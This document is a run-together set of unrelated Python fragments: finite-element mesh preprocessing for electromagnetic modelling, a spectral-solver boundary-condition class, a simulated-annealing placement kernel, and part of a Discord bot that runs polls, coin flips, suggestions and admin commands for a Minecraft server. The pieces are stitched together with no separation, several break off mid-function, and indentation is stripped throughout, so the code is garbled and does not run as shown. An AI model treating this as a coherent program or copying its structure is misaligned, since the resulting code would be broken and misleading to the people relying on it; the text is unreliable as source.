from .hvfem import computeConnectivityDOFS
# ###############################################################
# ################ CLASSES DEFINITION ##################
# ###############################################################
@measure_all_class_methods
class Preprocessing():
"""Class for preprocessing."""
def __init__(self):
"""Initialization of a preprocessing class."""
return
def run(self, inputSetup):
"""Run a preprocessing task.
:param obj inputSetup: inputSetup object.
:return: None
"""
# ---------------------------------------------------------------
# Obtain the MPI environment
# ---------------------------------------------------------------
parEnv = MPIEnvironment()
# Start timer
Timers()["Preprocessing"].start()
# ---------------------------------------------------------------
# Preprocessing (sequential task)
# ---------------------------------------------------------------
if( parEnv.rank == 0 ):
# Parameters shortcut (for code legibility)
model = inputSetup.model
run = inputSetup.run
output = inputSetup.output
out_dir = output.get('directory_scratch')
# Compute number of dofs per element
basis_order = run.get('nord')
            num_dof_in_element = int(basis_order*(basis_order+2)*(basis_order+3)/2)
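            # e.g. nord=1 -> 6 dofs per tetrahedron, nord=2 -> 20, nord=3 -> 45.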
if (model.get('mode') == 'csem'):
mode = 'csem'
elif (model.get('mode') == 'mt'):
mode = 'mt'
# Get data model
data_model = model.get(mode)
# ---------------------------------------------------------------
# Import mesh file
# ---------------------------------------------------------------
mesh_file = model.get('mesh')
# Import mesh
mesh = meshio.read(mesh_file)
# Number of elements
size = mesh.cells[0][1][:].shape
nElems = size[0]
# ---------------------------------------------------------------
# Preprocessing nodal coordinates
# ---------------------------------------------------------------
Print.master(' Nodal coordinates')
            # Build coordinates in PETGEM format where each row
            # represents the xyz coordinates of the 4 nodes of a tetrahedral element
num_dimensions = 3
num_nodes_per_element = 4
data = mesh.points[mesh.cells[0][1][:], :]
data = data.reshape(nElems, num_dimensions*num_nodes_per_element)
# Get matrix dimensions
size = data.shape
# Build PETSc structures
matrix = createSequentialDenseMatrixWithArray(size[0], size[1], data)
# Build path to save the file
out_path = out_dir + '/nodes.dat'
# Write PETGEM nodes in PETSc format
writeParallelDenseMatrix(out_path, matrix, communicator=PETSc.COMM_SELF)
# Remove temporal matrix
del matrix
# ---------------------------------------------------------------
# Preprocessing mesh connectivity
# ---------------------------------------------------------------
Print.master(' Mesh connectivity')
# Get matrix dimensions
size = mesh.cells[0][1][:].shape
# Build PETSc structures
matrix = createSequentialDenseMatrixWithArray(size[0], size[1], mesh.cells[0][1][:])
# Build path to save the file
out_path = out_dir + '/meshConnectivity.dat'
# Write PETGEM connectivity in PETSc format
writeParallelDenseMatrix(out_path, matrix, communicator=PETSc.COMM_SELF)
# Remove temporal matrix
del matrix
# ---------------------------------------------------------------
# Preprocessing edges connectivity
# ---------------------------------------------------------------
Print.master(' Edges connectivity')
# Compute edges
elemsE, edgesNodes = computeEdges(mesh.cells[0][1][:], nElems)
nEdges = edgesNodes.shape[0]
# Get matrix dimensions
size = elemsE.shape
# Build PETSc structures
matrix = createSequentialDenseMatrixWithArray(size[0], size[1], elemsE)
# Build path to save the file
out_path = out_dir + '/edges.dat'
# Write PETGEM edges in PETSc format
writeParallelDenseMatrix(out_path, matrix, communicator=PETSc.COMM_SELF)
# Remove temporal matrix
del matrix
# Reshape edgesNodes and save
num_nodes_per_edge = 2
num_edges_per_element = 6
            data = np.array((edgesNodes[elemsE[:], :]), dtype=float)
data = data.reshape(nElems, num_nodes_per_edge*num_edges_per_element)
# Get matrix dimensions
size = data.shape
# Build PETSc structures
matrix = createSequentialDenseMatrixWithArray(size[0], size[1], data)
# Build path to save the file
out_path = out_dir + '/edgesNodes.dat'
# Write PETGEM edgesNodes in PETSc format
writeParallelDenseMatrix(out_path, matrix, communicator=PETSc.COMM_SELF)
# Remove temporal matrix
del matrix
# ---------------------------------------------------------------
# Preprocessing faces connectivity
# ---------------------------------------------------------------
Print.master(' Faces connectivity')
# Compute faces
elemsF, facesN = computeFaces(mesh.cells[0][1][:], nElems)
nFaces = facesN.shape[0]
# Get matrix dimensions
size = elemsF.shape
# Build PETSc structures
matrix = createSequentialDenseMatrixWithArray(size[0], size[1], elemsF)
# Build path to save the file
out_path = out_dir + '/faces.dat'
            # Write PETGEM faces in PETSc format
writeParallelDenseMatrix(out_path, matrix, communicator=PETSc.COMM_SELF)
# Remove temporal matrix
del matrix
# ---------------------------------------------------------------
# Preprocessing faces-edges connectivity
# ---------------------------------------------------------------
Print.master(' Faces-edges connectivity')
facesE = computeFacesEdges(elemsF, elemsE, nFaces, nElems)
num_faces_per_element = 4
num_edges_per_face = 3
            data = np.array((facesE[elemsF[:], :]), dtype=float)
data = data.reshape(nElems, num_faces_per_element*num_edges_per_face)
# Get matrix dimensions
size = data.shape
# Build PETSc structures
matrix = createSequentialDenseMatrixWithArray(size[0], size[1], data)
# Build path to save the file
out_path = out_dir + '/facesEdges.dat'
            # Write PETGEM faces-edges in PETSc format
writeParallelDenseMatrix(out_path, matrix, communicator=PETSc.COMM_SELF)
del matrix
# ---------------------------------------------------------------
# Preprocessing dofs connectivity
# ---------------------------------------------------------------
Print.master(' DOFs connectivity')
# Compute degrees of freedom connectivity
basis_order = run.get('nord')
dofs, dof_edges, dof_faces, _, total_num_dofs = computeConnectivityDOFS(elemsE,elemsF,basis_order)
# Get matrix dimensions
size = dofs.shape
# Build PETSc structures
matrix = createSequentialDenseMatrixWithArray(size[0], size[1], dofs)
# Build path to save the file
out_path = out_dir + '/dofs.dat'
            # Write PETGEM dofs in PETSc format
writeParallelDenseMatrix(out_path, matrix, communicator=PETSc.COMM_SELF)
del matrix
# ---------------------------------------------------------------
# Preprocessing sigma model
# ---------------------------------------------------------------
Print.master(' Conductivity model')
i_model = data_model.get('sigma')
if (run.get('conductivity_from_file')):
# Open sigma file
sigma_file = i_model.get('file')
fileID = h5py.File(sigma_file, 'r')
# Read sigma file
conductivityModel = fileID.get('data')[()]
else:
# Get physical groups
elemsS = mesh.cell_data['gmsh:physical'][0]
                elemsS -= 1  # 0-based indexing
# Get horizontal sigma
horizontal_sigma = i_model.get('horizontal')
vertical_sigma = i_model.get('vertical')
# Allocate conductivity array
                conductivityModel = np.zeros((nElems, 2), dtype=float)
for i in np.arange(nElems):
# Set horizontal sigma
                    conductivityModel[i, 0] = horizontal_sigma[int(elemsS[i])]
                    # Set vertical sigma
                    conductivityModel[i, 1] = vertical_sigma[int(elemsS[i])]
# Get matrix dimensions
size = conductivityModel.shape
# Build PETSc structures
matrix = createSequentialDenseMatrixWithArray(size[0], size[1], conductivityModel)
# Build path to save the file
out_path = out_dir + '/conductivityModel.dat'
            # Write PETGEM conductivity model in PETSc format
writeParallelDenseMatrix(out_path, matrix, communicator=PETSc.COMM_SELF)
del matrix
# ---------------------------------------------------------------
# Preprocessing boundaries
# ---------------------------------------------------------------
Print.master(' Boundaries')
# Compute boundary faces
bFacesN, bFaces, nbFaces = computeBoundaryFaces(elemsF, facesN)
# Build array with boundary dofs for csem mode (dirichlet BC)
if (mode == 'csem'):
# Compute boundary edges
bEdges = computeBoundaryEdges(edgesNodes, bFacesN)
# Compute dofs on boundaries
_, indx_boundary_dofs = computeBoundaries(dofs, dof_edges, dof_faces, bEdges, bFaces, basis_order);
# Build PETSc structures
vector = createSequentialVectorWithArray(indx_boundary_dofs)
# Build path to save the file
out_path = out_dir + '/boundaries.dat'
                # Write PETGEM boundaries in PETSc format
writePetscVector(out_path, vector, communicator=PETSc.COMM_SELF)
del vector
elif (mode == 'mt'):
# Compute to what plane the boundary face belongs
planeFace = computeFacePlane(mesh.points, bFaces, bFacesN)
# Compute boundary elements
bElems, numbElems = computeBoundaryElements(elemsF, bFaces, nFaces)
if (nbFaces != numbElems):
Print.master(' Number of boundary faces is not consistent.')
exit(-1)
# Allocate
                data_boundaries = np.zeros((nbFaces, 53+num_dof_in_element), dtype=float)
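                # Row layout assembled below: [0:4] node ids, [4:16] node
                # coordinates, [16:20] face ids, [20:32] per-face edge ids,
                # [32:38] edge ids, [38:50] edge-node ids, [50] face plane,
                # [51] global face index, [52] sigma, [53:] element dofs.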
# Fill tmp matrix with data for boundary faces
for i in np.arange(nbFaces):
# Get index of tetrahedral element (boundary element)
iEle = bElems[i]
# Get dofs of element container
dofsElement = dofs[iEle, :]
# Get indexes of nodes for i-boundary element and insert
nodesBoundaryElement = mesh.cells[0][1][iEle,:]
data_boundaries[i, 0:4] = nodesBoundaryElement
# Get nodes coordinates for i-boundary element and insert
coordEle = mesh.points[nodesBoundaryElement, :]
coordEle = coordEle.flatten()
data_boundaries[i, 4:16] = coordEle
# Get indexes of faces for i-boundary element and insert
facesBoundaryElement = elemsF[iEle, :]
data_boundaries[i, 16:20] = facesBoundaryElement
# Get edges indexes for faces in i-boundary element and insert
edgesBoundaryFace = facesE[facesBoundaryElement, :]
edgesBoundaryFace = edgesBoundaryFace.flatten()
data_boundaries[i, 20:32] = edgesBoundaryFace
# Get indexes of edges for i-boundary and insert
edgesBoundaryElement = elemsE[iEle, :]
data_boundaries[i, 32:38] = edgesBoundaryElement
# Get node indexes for edges in i-boundary and insert
edgesNodesBoundaryElement = edgesNodes[edgesBoundaryElement, :]
edgesNodesBoundaryElement = edgesNodesBoundaryElement.flatten()
data_boundaries[i, 38:50] = edgesNodesBoundaryElement
# Get plane face
ifacetype = planeFace[i]
data_boundaries[i, 50] = ifacetype
# Get global face index
localFaceIndex = bFaces[i]
data_boundaries[i, 51] = localFaceIndex
# Get sigma value
sigmaEle = conductivityModel[iEle, 0]
data_boundaries[i, 52] = sigmaEle
# Get dofs for boundary element and insert
dofsBoundaryElement = dofsElement
data_boundaries[i, 53::] = dofsBoundaryElement
# Get matrix dimensions
size = data_boundaries.shape
# Build PETSc structures
matrix = createSequentialDenseMatrixWithArray(size[0], size[1], data_boundaries)
# Build path to save the file
out_path = out_dir + '/boundaryElements.dat'
                # Write PETGEM boundary elements in PETSc format
writeParallelDenseMatrix(out_path, matrix, communicator=PETSc.COMM_SELF)
del matrix
del data_boundaries
# ---------------------------------------------------------------
# Preprocessing receivers
# ---------------------------------------------------------------
Print.master(' Receivers')
# Open receivers_file
receivers_file = model.get('receivers')
fileID = h5py.File(receivers_file, 'r')
# Read receivers
receivers = fileID.get('data')[()]
# Number of receivers
if receivers.ndim == 1:
nReceivers = 1
else:
dim = receivers.shape
nReceivers = dim[0]
            # Find out which tetrahedral element the source point is in (only for csem mode)
if (mode == 'csem'):
# Allocate vector to save source data
                data_source = np.zeros(50+num_dof_in_element, dtype=float)
i_model = data_model.get('source')
# Get source position
                i_source_position = np.asarray(i_model.get('position'), dtype=float)
# Build Delaunay triangulation with nodes
tri = Delaunay(mesh.points)
r"""@package motsfinder.ndsolve.bcs
Classes for imposing boundary conditions.
"""
from __future__ import print_function
from builtins import range
import numpy as np
from mpmath import mp
from ..utils import isiterable, lmap
from .common import _make_callable
__all__ = [
"DirichletCondition",
"NeumannCondition",
"RobinCondition",
]
class NDSolveError(Exception):
r"""Raised for problems of the numerical task (like ill-conditioned
boundary conditions)."""
pass
class RobinCondition(object):
r"""General Robin-type boundary condition.
This class represents general Dirichlet, Neumann, or mixed (Robin) type
boundary conditions suitable for 1D and 2D problems.
After you have constructed such a condition object, it is used as an
argument for the spectral solver (ndsolve() or NDSolver) in order to be
imposed in the resulting matrix equation.
"""
def __init__(self, x, alpha, beta, value, corners=True, add_rows=False):
r"""Define the boundary condition.
The general form of this boundary condition is \f[
\alpha(x) u(x) + \beta(x) \partial_\nu u(x) = g(x),
\f]
where \f$ x \f$ is specified by the `x` argument (see below) and
\f$ g(x) \f$ is given by `value`. The derivative of `u` is taken to be
perpendicular to the direction of the line specified by `x`, i.e. it
will be the outward pointing normal at the upper boundary and inward
pointing normal at the lower boundary of the respective dimension.
In 1D, we simply have \f$ \partial_\nu u(x) = u'(x) \f$.
For a pure Dirichlet condition, set ``alpha=1, beta=0`` and for a pure
Neumann condition ``alpha=0, beta=1``.
@param x
(float or tuple/list)
Value at which to impose the condition. For 1D problems, this
should simply be the `x`-value at which to impose the condition.
For 2D problems, it should be a tuple/list specifying the
`x=const` or `y=const` line to impose the condition at. For
example, to define the line `x=5`, this argument should be set to
`x=(5.0, None)`.
@param alpha
(float or callable)
Coefficient of the 'Dirichlet' part of the condition (see above).
@param beta
(float or callable)
Coefficient of the 'Neumann' part of the condition (see above).
@param value
(float or callable)
Value of the condition (see above).
@param corners
(boolean, optional)
Only relevant in 2D. If `True` (default), apply the condition at
all collocation points along the specified axis including the
boundary ones. If `False`, the boundary points are excluded. This
may be important to make the resulting matrix equation a full-rank
equation, since imposing multiple conditions at the same points
(e.g. the corners) may make the matrix singular.
@param add_rows
(boolean, optional)
Whether to add or replace rows in the matrix and the inhomogeneity
vector to impose the condition. Adding rows will create a
non-square matrix, i.e. the system may become overdetermined and
must be solved using e.g. a least squares method such as
`scipy.lstsq`. Default is `False`, i.e. to replace rows, which is
what you should do to get a determined system of equations.
"""
## Where to impose the condition
self._x = x
## Callable or value multiplying the function
self._alpha = alpha
## Callable or value multiplying the function's first derivative
self._beta = beta
## Callable or value the function + derivative (as specified by
## `alpha` and `beta`) should attain.
self._value = value
## Whether to include the corners/ends for the 2D case.
self._corners = corners
## Whether to add more equations or replace existing ones.
self._add_rows = add_rows
if isiterable(x) and len(x) == 1:
x = x[0]
if isiterable(x):
self._dim = len(x)
if x.count(None) != self._dim - 1:
raise ValueError("Condition must be imposed along one axis.")
self._idx = [i for i, p in enumerate(x) if p is not None][0]
else:
if not corners:
raise ValueError("Corners can't be skipped in 1D.")
## Auto-determined dimension of the problem
self._dim = 1
## Axis along which to impose the condition
self._idx = 0
def impose(self, basis, L, f, blocked_indices, L_done=False, f_done=False,
use_mp=False):
r"""Impose the condition by modifying the operator and inhomogeneity.
This should be called only during the solving process when the
operator matrix `L` and inhomogeneity vector `f` have been built. The
caller should supply the indices of rows (via `blocked_indices`) on
which previous conditions have been placed to avoid overwriting them
with the new conditions. The indices used here will be added to this
list (i.e. the caller only needs to repeatedly supply this list,
starting with an empty one).
@param basis
Spectral basis used during solving.
@param L
Fully populated operator matrix.
@param f
Inhomogeneity vector.
@param blocked_indices
List which is updated by this method to store which equations have
been replaced (in order not to replace a condition in later
calls).
@param L_done
Whether the operator matrix `L` has already been processed and
should be left untouched. May be useful if caching of matrices
with conditions already imposed is done, which may speed up
computation significantly.
@param f_done
Whether the inhomogeneity has already been processed and should be
left untouched. Might be useful when re-using the same
inhomogeneity (and same basis) to solve the same equation with
different boundary conditions.
@param use_mp
Whether to use arbitrary precision math operations (`True`) or
faster floating point precision operations (`False`, default).
"""
if L_done and f_done:
return L, f
alpha = _make_callable(self._alpha, use_mp=use_mp)
beta = _make_callable(self._beta, use_mp=use_mp)
value = _make_callable(self._value, use_mp=use_mp)
num = basis.num
idx = range(num)
zero_row = mp.zeros(1, num) if use_mp else np.zeros(num)
diff = self._idx + 1
rows_to_append = []
vals_to_append = []
for i, x in self._get_points(basis):
i = self._find_free_index(i, num-1, blocked_indices)
if i is not None:
blocked_indices.append(i)
x_phys = basis.transform(x, back=False)
a = alpha(x_phys)
b = beta(x_phys)
v = value(x_phys)
if a == b == 0:
continue
if not L_done:
Cx = DCx = zero_row
if a != 0:
Cx = basis.evaluate_all_at(x, 0)
if b != 0:
if self._dim > 2:
raise NotImplementedError("Neumann or mixed conditions not "
"implemented for dim > 2.")
DCx = basis.evaluate_all_at(x, diff)
# NOTE: Originally, we had sparse indices (e.g. for basis functions
# left out from the set). This led to high complexity in
# index-types, i.e. the consecutive running indices vs.
# the subscript of the actual basis function. This might
# be required if we add further functionality to the
# system. At this point, one remainder is that the
# indices in `idx` could be sparse, whereas `j` can't.
row = [a*Cx[j] + b*DCx[j] for j in range(len(idx))]
if not any(row):
raise NDSolveError("Boundary condition numerically ill-conditioned. "
"The condition might already be satisfied by the "
"chosen basis or alpha = beta = 0.")
if i is None:
rows_to_append.append(row)
else:
self._replace_row(basis.ctx, L, i, row)
if not f_done:
if i is None:
vals_to_append.append([v])
else:
f[i] = v
if rows_to_append:
L = self._append_rows(L, rows_to_append)
if vals_to_append:
f = self._append_rows(f, vals_to_append)
return L, f
def _replace_row(self, ctx, mat, n, row):
r"""Replace a row of a matrix by a different row.
This is a convenience function that handles the case of a NumPy matrix
and that of an `mpmath` matrix.
@param ctx
`mp` or `fp`, the mpmath context to use if not a NumPy matrix.
@param mat
The NumPy or mpmath matrix to replace a row in.
@param n
The row index of the row to replace.
@param row
The new data to write into the row. May be a `list`.
"""
if isinstance(mat, np.ndarray):
mat[n,:] = lmap(float, row)
else:
mat[n,:] = ctx.matrix([row])
def _append_rows(self, mat, rows):
r"""Add rows to a NumPy or mpmath matrix.
@param mat
NumPy or mpmath matrix to add the rows to.
@param rows
List of rows, each being an iterable containing the respective
row's values.
"""
if isinstance(mat, np.ndarray):
mat = np.append(mat, [lmap(float, r) for r in rows], axis=0)
elif isinstance(mat, list):
if len(rows[0]) != 1:
raise TypeError("Can only append 1D column to list.")
mat.extend(r[0] for r in rows)
else:
mat = mp.matrix(mat.tolist() + rows)
return mat
def _find_free_index(self, i, max_i, blocked):
r"""Return an index of a row we should replace next.
This is called after the row to | |
"""A Python implementation of the Simulated Annealing kernel."""
from six import iteritems
import math
import time
import importlib
from rig.place_and_route.place.utils import \
add_resources, subtract_resources, overallocated
import warnings
class PythonKernel(object):
"""An implementation of the Simulated Annealing placement algorithm kernel
written in Python.
This implementation is not optimised for runtime but should produce good
quality, correct results on any platform, albeit slowly.
This kernel will display a warning/hint if placement is taking a long time
suggesting installing ``rig_c_sa`` to enable use of the faster
:py:class:`~rig.place_and_route.place.place.sa.c_kernel.CKernel`. To
disable this warning, the kernel takes an optional ``no_warn`` argument
which, when True, disables the warning.
"""
"""Display a warning/hint to install rig_c_sa if placement takes longer
than this many seconds.
"""
WARN_TIME = 2.0 * 60.0
def __init__(self, vertices_resources, movable_vertices, fixed_vertices,
initial_placements, nets, machine, random, no_warn=False):
self.vertices_resources = vertices_resources
self.movable_vertices = list(movable_vertices)
self.fixed_vertices = fixed_vertices
self.placements = initial_placements.copy()
self.nets = nets
self.machine = machine
self.random = random
if no_warn:
self.start_time = None
else:
self.start_time = time.time()
self.has_wrap_around_links = self.machine.has_wrap_around_links()
# Location-to-Vertices: A lookup {(x, y): [vertex, ...], ...} giving
# the set of vertices on a given chip. Chips which are not in the
# machine are excluded from this lookup.
self.l2v = {xy: [] for xy in self.machine}
for vertex, location in iteritems(self.placements):
self.l2v[location].append(vertex)
# Vertices-to-Nets: A lookup {vertex: [Net, ...], ...}, gives a list of
# nets of which the given vertex is a member.
self.v2n = {v: [] for v in self.vertices_resources}
for net in nets:
for v in net:
if net not in self.v2n[v]:
self.v2n[v].append(net)
def run_steps(self, num_steps, distance_limit, temperature):
# If the placement runs for a long time, hint that the C-based placer
# is much faster.
if (self.start_time is not None and
time.time() - self.start_time > self.WARN_TIME):
# Only show the warning/hint if the C Kernel is not installed.
try:
                # NB: This import is performed using importlib rather than an
# import statement to enable easier testing since this function
# call can be trivially mocked out.
importlib.import_module(
"rig.place_and_route.place.sa.c_kernel")
except ImportError:
warnings.warn(
"It appears you are placing a large graph using the "
"slow Python-based simulated annealing kernel. "
"Installing the rig_c_sa package may result in a 50-150x "
"speedup without any change to your code.",
stacklevel=3)
# Prevent future warnings
self.start_time = None
num_accepted = 0
deltas = []
for _ in range(num_steps):
swapped, delta = _step(self.movable_vertices,
distance_limit, temperature,
self.placements, self.l2v, self.v2n,
self.vertices_resources,
self.fixed_vertices,
self.machine,
self.has_wrap_around_links,
self.random)
num_accepted += 1 if swapped else 0
deltas.append(delta)
mean = sum(deltas) / float(len(deltas))
std = math.sqrt(sum((v-mean)**2 for v in deltas) / len(deltas))
cost = sum((_net_cost(net, self.placements, self.has_wrap_around_links,
self.machine)
for net in self.nets), 0.0)
return num_accepted, cost, std
def get_placements(self):
return self.placements
def _net_cost(net, placements, has_wrap_around_links, machine):
"""Get the cost of a given net.
This function, in principle at least, should estimate the total network
resources consumed by the given net. In practice this estimate is based on
the size of the bounding-box of the net (i.e. HPWL). This should be
improved at some later time to better account for the effects of large
fan-outs.
Parameters
----------
net : :py:class:`rig.netlist.Net`
placements : {vertex: (x, y), ...}
has_wrap_around_links : bool
machine : :py:class:`rig.place_and_route.Machine`
Returns
-------
float
"""
# This function is by far the hottest code in the entire algorithm, as a
# result, small performance improvements in here can have significant
# impact on the runtime of the overall algorithm. As an unfortunate side
# effect, this code is rather ugly since many higher-level constructs (e.g.
# min/max) are outrageously slow.
# XXX: This does not account for the hexagonal properties of the SpiNNaker
# topology.
if has_wrap_around_links:
# When wrap-around links exist, we find the minimal bounding box and
# return the HPWL weighted by the net weight. To do this the largest
# gap between any pair of vertices is found::
#
# | x x x |
# ^-------------^
# max gap
#
# The minimal bounding box then goes the other way around::
#
# | x x x |
# ----------^ ^---
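        #
        # As a hypothetical numeric example: with machine.width == 10 and
        # xs == [1, 2, 8], the largest gap is 8 - 2 = 6, so the wrapped
        # x-extent is 10 - 6 = 4 (from x=8 around the edge to x=2).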
# First we collect the x and y coordinates of all vertices in the net
# into a pair of (sorted) lists, xs and ys.
x, y = placements[net.source]
num_vertices = len(net.sinks) + 1
xs = [x] * num_vertices
ys = [y] * num_vertices
i = 1
for v in net.sinks:
x, y = placements[v]
xs[i] = x
ys[i] = y
i += 1
xs.sort()
ys.sort()
# The minimal bounding box is then found as above.
x_max_delta = 0
last_x = xs[-1] - machine.width
for x in xs:
delta = x - last_x
last_x = x
if delta > x_max_delta:
x_max_delta = delta
y_max_delta = 0
last_y = ys[-1] - machine.height
for y in ys:
delta = y - last_y
last_y = y
if delta > y_max_delta:
y_max_delta = delta
return (((machine.width - x_max_delta) +
(machine.height - y_max_delta)) *
net.weight)
else:
# When no wrap-around links, find the bounding box around the vertices
# in the net and return the HPWL weighted by the net weight.
x1, y1 = x2, y2 = placements[net.source]
for vertex in net.sinks:
x, y = placements[vertex]
x1 = x if x < x1 else x1
y1 = y if y < y1 else y1
x2 = x if x > x2 else x2
y2 = y if y > y2 else y2
return ((x2 - x1) + (y2 - y1)) * float(net.weight)
def _vertex_net_cost(vertex, v2n, placements, has_wrap_around_links, machine):
"""Get the total cost of the nets connected to the given vertex.
Parameters
----------
vertex
The vertex whose nets we're interested in.
v2n : {vertex: [:py:class:`rig.netlist.Net`, ...], ...}
placements : {vertex: (x, y), ...}
has_wrap_around_links : bool
machine : :py:class:`rig.place_and_route.Machine`
Returns
-------
float
"""
total_cost = 0.0
for net in v2n[vertex]:
total_cost += _net_cost(net, placements, has_wrap_around_links,
machine)
return total_cost
def _get_candidate_swap(resources, location,
l2v, vertices_resources, fixed_vertices, machine):
"""Given a chip location, select a set of vertices which would have to be
moved elsewhere to accommodate the arrival of the specified set of
resources.
Parameters
----------
resources : {resource: value, ...}
The amount of resources which are required at the specified location.
location : (x, y)
The coordinates of the chip where the resources are sought.
l2v : {(x, y): [vertex, ...], ...}
vertices_resources : {vertex: {resource: value, ...}, ...}
fixed_vertices : {vertex, ...}
machine : :py:class:`rig.place_and_route.Machine`
Returns
-------
[Vertex, ...] or None
If a (possibly empty) list, gives the set of vertices which should be
removed from the specified location to make room.
If None, the situation is impossible.
"""
# The resources already available at the given location
chip_resources = machine[location]
# The set of vertices at that location
vertices = l2v[location]
# The set of vertices to be moved from the location to free up the
# specified amount of resources
to_move = []
# While there's not enough free resource, remove an arbitrary (movable)
# vertex from the chip.
i = 0
while overallocated(subtract_resources(chip_resources, resources)):
if i >= len(vertices):
# Run out of vertices to remove from this chip, thus the situation
# must be impossible.
return None
elif vertices[i] in fixed_vertices:
# Can't move fixed vertices, just skip them.
i += 1
continue
else:
# Work out the cost change when we remove the specified vertex
vertex = vertices[i]
chip_resources = add_resources(chip_resources,
vertices_resources[vertex])
to_move.append(vertex)
i += 1
return to_move
def _swap(vas, vas_location, vbs, vbs_location, l2v, vertices_resources,
placements, machine):
"""Swap the positions of two sets of vertices.
Parameters
----------
vas : [vertex, ...]
A set of vertices currently at vas_location.
vas_location : (x, y)
vbs : [vertex, ...]
A set of vertices currently at vbs_location.
vbs_location : (x, y)
l2v : {(x, y): [vertex, ...], ...}
vertices_resources : {vertex: {resource: value, ...}, ...}
placements : {vertex: (x, y), ...}
machine : :py:class:`rig.place_and_route.Machine`
"""
# Get the lists of vertices | |
a Poll")
return
else:
p = await ctx.send(embed=p_embed) # Sending the Embed
await p.add_reaction("<:1_bot:957922958502952981>") # Adding 1 reaction
await p.add_reaction("<:2_bot:957922954119888917>") # Adding 2 reaction
if int(reactionc) == 3:
await p.add_reaction("<:3_bot:957922953893384192>") # Checking if number is 3, if yes add 3 reaction
        elif int(reactionc) == 4: # Checking if the number is 4
await p.add_reaction("<:3_bot:957922953893384192>") # Adding 3 reaction
await p.add_reaction("<:4_bot:957922953381707797>") # Adding 4 reaction
# dm = await ctx.member.create_dm()
# await dm.send("hi this is a dear message")
# await ctx.reply("Your Poll was sent!")
await logger("f", f"Sent Poll embed to message of {ctx.author.name}#{ctx.author.discriminator}", "fun", f"Sent Poll embed to message of {ctx.author.name}#{ctx.author.discriminator}") # Logs to Log channel
@client.command(aliases=['head', 'tail', 'flip', 'flipcoin'])
async def coinflip(ctx): # Coin Flip Command
if await checkcommandchannel(ctx): return # Checks if command was executed in the Command Channel
determine_flip = [1, 0] # The options
if random.choice(determine_flip) == 1: value = "Heads"
else: value = "Tails"
embed = discord.Embed(title="Coin Flip", description=f"{ctx.author.mention} Flipped a coin!, They got **{value}**",color=embed_color)
if value == "Heads": embed.set_image(url="https://cdn.discordapp.com/attachments/951055432833695767/960211489254436935/head.png") # Setting head image
else: embed.set_image(url="https://cdn.discordapp.com/attachments/951055432833695767/960211488772083752/tail.png") # Setting tails image
embed.set_author(name=embed_header)
embed.set_footer(text=embed_footer)
await ctx.send(embed=embed)
await logger("f", f'Sent Coin Flip result to message of {ctx.author.name}#{ctx.author.discriminator}', "fun", f'Sent Coin Flip result to message of {ctx.author.name}#{ctx.author.discriminator}')
@client.command(aliases=['suggestion', 'createsuggestion']) # Suggest Command
async def suggest(ctx, *data):
if await checkcommandchannel(ctx): return # Checks if command was executed in the Command Channel
data = " ".join(data).split(' | ') # Input Splitter
"""
if data[0] == " " or "": # Checks if the first input is empty
await ctx.send("Please enter a suggestion!")
return
"""
if len(data) != 1: # Checks if there is more than one input
if not data[1].startswith("https://") or data[1].startswith("http://"): # Checks if the second input starts with https://
await ctx.send("0- Please enter a valid image link!")
return
""""
elif not data[1].endswith(".png") or not data[1].endswith(".jpg") or not data[1].endswith(".jpeg"): # Checks if the second input ends with .png, .jpg or .jpeg
await ctx.send("1- Please enter a valid image link!")
return
"""
s = data[0].replace(" nl ", " \n") # Replacing nl with \n
#The embed
cat = "s"
s_embed = discord.Embed(title=f"Suggestion", url="https://moonball.io", color=embed_color)
s_embed.add_field(name=f"Submitted by {ctx.author.name}#{ctx.author.discriminator}", value=f"Suggestion #{countadd(cat)}\n{s}", inline=True)
if len(data) > 1: s_embed.set_image(url=data[1]) # Setting image
s_embed.set_footer(text=f"{embed_footer}")
s = await suggestion_channel.send(embed=s_embed)
#Adding reactions
await s.add_reaction("<:tick_bot:953561636566863903>") # Adding tick reaction
await s.add_reaction("<:cross_bot:953561649254649866>") # Adding cross reaction
await embed_log.send(embed=s_embed) # Sending it to the Logs channel
await ctx.reply(f"Your Suggestion was sent! Check <#960203053103972403> to see how its doing!")
print("Sent {}'s suggestion to the suggestion channel!".format(ctx.author.name))
#
#
# Admin Command & Logging Function Section
#
#
# Send Command to Server
@admin.command(aliases=['cmd', 'send', 'sendcmd'])
@commands.has_permissions(administrator=True)
async def sendcmd_admin(ctx, *data): # Send Command Admin Command
data = " ".join(data).split(' | ') # Input Splitter
valid_names = ["proxy", "limbo", "parkour", "auth", "lobby", "survival", "skyblock", "duels", "bedwars", "bot"]
if data[0] not in valid_names: await ctx.send("Invalid Name"); return "invalid_name"
if data[1] == "": await ctx.send("Invalid command to send"); return "invalid_cmd"
try:
p = await sendcmd(ctx, data[0], data[1])
except:
await ctx.reply("There was a error in sending the command")
return
if p != "done": return
embed = discord.Embed(title="Admin - Send Command", url="https://moonball.io", color=embed_color)
embed.set_author(name=f"{embed_header}")
embed.add_field(name="Operation Successful!", value=f"Successfully Sent the Command. Issued by {ctx.author.name}#{ctx.author.discriminator} \n \n**Server** - `{data[0]}` \n **Command** - `{data[1]}`",inline=False)
embed.set_footer(text=f"{embed_footer}")
await ctx.reply(embed=embed)
await embed_log.send(embed=embed) # Sending it to the Logs channel
await logger("a", f'{ctx.author.name}#{ctx.author.discriminator} sent a command to `{data[0]}`', "admin", f'{ctx.author.name}#{ctx.author.discriminator} sent a command to `{data[0]}`')
# Economy Commands
@admin.command(aliases=['takemoney', 'take', 'take_money'])
@commands.has_permissions(administrator=True)
async def take_money_admin(ctx, *data): # Take Money Admin Command
    if len(data[0]) < 3 or len(data[0]) > 16: await ctx.send("Invalid Username"); return "invalid_username"
elif not data[1].isnumeric(): await ctx.send("Invalid Amount"); return "invalid_amount"
try:
p = await sendcmd(ctx, "survival", f"eco take {data[0]} {data[1]}")
except:
await ctx.reply("There was a error in sending the command"); return
if p != "done": return
embed = discord.Embed(title="Admin - Take Money", url="https://moonball.io", color=embed_color)
embed.set_author(name=f"{embed_header}")
embed.add_field(name="Operation Successful!", value=f"Successfully took {data[1]} from {data[0]} \n \n**User** - `{data[0]}` \n **Amount** - `{data[1]}`",inline=False)
embed.set_footer(text=f"{embed_footer}")
await ctx.reply(embed=embed)
await embed_log.send(embed=embed) # Sending it to the Logs channel
await logger("a", f'{ctx.author.name}#{ctx.author.discriminator} took {data[1]} from {data[0]}', "admin", f'{ctx.author.name}#{ctx.author.discriminator} took {data[1]} from {data[0]}')
@admin.command(aliases=['givemoney', 'give', 'give_money'])
@commands.has_permissions(administrator=True)
async def give_money_admin(ctx, *data): # Give Money Admin Command
